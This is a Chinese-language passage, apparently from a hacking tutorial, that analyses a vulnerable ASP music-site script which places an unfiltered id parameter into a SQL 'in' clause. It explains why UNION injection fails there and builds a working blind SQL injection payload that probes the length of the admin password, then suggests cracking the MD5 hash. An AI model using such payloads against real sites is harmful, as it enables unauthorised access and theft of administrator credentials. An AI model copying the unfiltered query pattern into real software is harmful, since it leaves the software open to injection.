if id1＜＞"" then ’判断id1是否为空
set rs=server.createobject("adodb.recordset")
id=id1
sql="select * from MusicList where id in (" & id & ")" ‘看仅仅判断是否为空就带入了sql语 句 查询，这个简单，大家都会
rs.open sql,conn,1,3
rs("hits")=rs("hits")+1 ’问题就出在这里，这一句，后面详细解释
rs.update
songpath=rs("song_path")
If songpath="" or IsNull(songpath) Then
后面的就不怎么有关了，就不详细分析了。
songpath=1
End If
select Case songpath
Case 1
song_path=song_path1
Case 2
song_path=song_path2
Case 3
song_path=song_path3
Case 4
song_path=song_path4
Case 5
song_path=song_path5
Case 6
song_path=song_path6
Case 7
song_path=song_path7
End select
song_path=song_path&rs("Wma")
－－－－－－－－－－－－－－－－－－－－－部分代码省略
看下这段代码，有学过asp的人，这个不是很明显的没有过滤注入产生了？没错，我当时一眼就说存在注射，可是我后面又仔细看了～，看到了这行
rs("hits")=rs("hits")+1
rs.update
注意到没,这句就使我们的union无处可用了，因为那个出来是不可写的。那么我们只有通过构造经典的sql语句了，看我构造：
id=1) sql and 1 in (1
前后的保证出来的有记录,加上中间加我们自己的sql语句,就可以注射了.假设这里关键表是admin,字段有 password , username
那么就可以这样写了：
id=1) and (select top 1 len(password) from admin)=16 and 1 in (1
出来的一般是面的md5加密的，去跑下，后面的自己看了小问题，解决就好了，不过不注意还是不行的～～～